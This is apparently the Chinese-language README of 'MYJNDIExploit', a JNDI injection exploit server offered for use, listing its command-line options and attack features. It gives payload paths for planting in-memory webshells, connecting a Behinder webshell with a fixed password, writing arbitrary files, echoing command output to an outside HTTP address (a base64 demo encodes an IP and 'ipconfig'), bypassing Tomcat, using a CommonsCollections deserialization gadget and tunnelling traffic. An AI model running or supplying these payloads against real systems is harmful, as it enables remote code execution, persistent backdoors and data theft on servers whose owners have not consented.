Home

Awesome

<h1 align="center">🌟MYJNDIExploit</h1>

絮絮念


这是我一直在用一直更新的一个小工具。不定期更新 (主要看近期有没有学习了......)

使用指南:

Usage: java -jar  MYJNDIExploit1.1.jar [options]
Options:
* -i, --ip       Local ip address
* 
  -l, --ldapPort Ldap bind port (default: 1389)
  
  -p, --httpPort Http bind port (default: 8080)
  
  -u, --usage    Show usage (default: false)
  
  -h, --help     Show this help
  
  -o, --output   out put file

新功能介绍

修改内存马利用密码:?type=basic&hack=whoami

冰蝎连接: 添加header: User-Agentt 密码:rebeyond 后续会做密码自定义

文件写入 /Basic/PutFile/Path/Content (Path 为Base64, Content 为Base64数据 其中 ‘/’ 用 ‘_]’替换,‘+’用_@_替换)

命令回显 Basic/commandecho/[httplog 回显地址 ]/[command] 
demo:Basic/commandecho/aHR0cDovLzQ3Ljk0LjEzMC54eDo5OTkv/aXBjb25maWc=

tomcat也一样:TomcatBypass/commandecho/aHR0cDovLzQ3Ljk0LjEzMC54eDo5OTkv/aXBjb25maWc=
Deserialization/CommonsCollectionsK1/commandecho/aHR0cDovLzQ3Ljk0LjEzMC54eDo5OTkv/aXBjb25maWc=

内存正向代理:/Basic/filetertunnel

动态指定路径:自定义class 存放在当前jar 同路径里的lib文件内
/Basic/myclass/Exp

即將添加功能

使用详细说明 --> OldReadme.md